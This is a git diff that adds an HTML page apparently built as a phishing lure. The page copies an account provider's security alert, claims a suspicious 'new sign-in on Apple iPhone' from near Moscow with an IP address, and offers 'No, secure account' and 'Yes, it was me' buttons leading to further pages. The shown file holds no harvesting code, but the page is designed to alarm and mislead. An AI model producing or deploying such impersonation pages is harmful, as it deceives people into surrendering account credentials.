--- a/index.html
+++ b/index.html
@@ -1,1 +1,38 @@
-<h1>TestText</h1>
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <meta http-equiv="X-UA-Compatible" content="">
+  <title>Registration Form</title>
+  <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css">
+  <link rel="stylesheet" href="style.css">
+</head>
+<body class="">
+
+  <div class="d-flex flex-column flex-md-row align-items-center p-3 px-md-4 mb-3 bg-white border-bottom shadow-sm">
+    <img src="">
+    <nav class="my-2 my-md-0 mr-md-3">
+    </nav>
+  </div>
+
+  <div class="container mt-5"><br>
+    <h3 class="my-0 font-weight-normal">New sign-in on Apple iPhone</h3><br>
+    <p>Your account is at risk if this wasn't you</p>
+
+    <div class="row ">
+      <img src="">
+      <div role="listitem" class="SCYJYc"><div class="gIpY2b" style="padding-left:30px"><div class="iegjpc"><span class="ijNgLe">Apple iPhone</span></div><div class="N2V6ic">Safari (Browser)</div><div class="mb-4 mt-2" style="padding-left:0px"><li>Time: 11 April, 11:30</li><li>Location: Near Moscow, Russia</li><div class="ml-4"><p>79.138.216.148 (IP address)</p></div></div></div></div>
+    </div>
+
+
+
+    <div class="vzFH0" jsname="y9Vufe">Do you recognise this activity?</div><br>
+
+
+    <a class="btn btn-light mb-5" href="no.html">No, secure account</a>
+    <a class="btn btn-light mb-5" href="yes.html" >Yes, it was me</a>
+
+
+</body>
+</html>
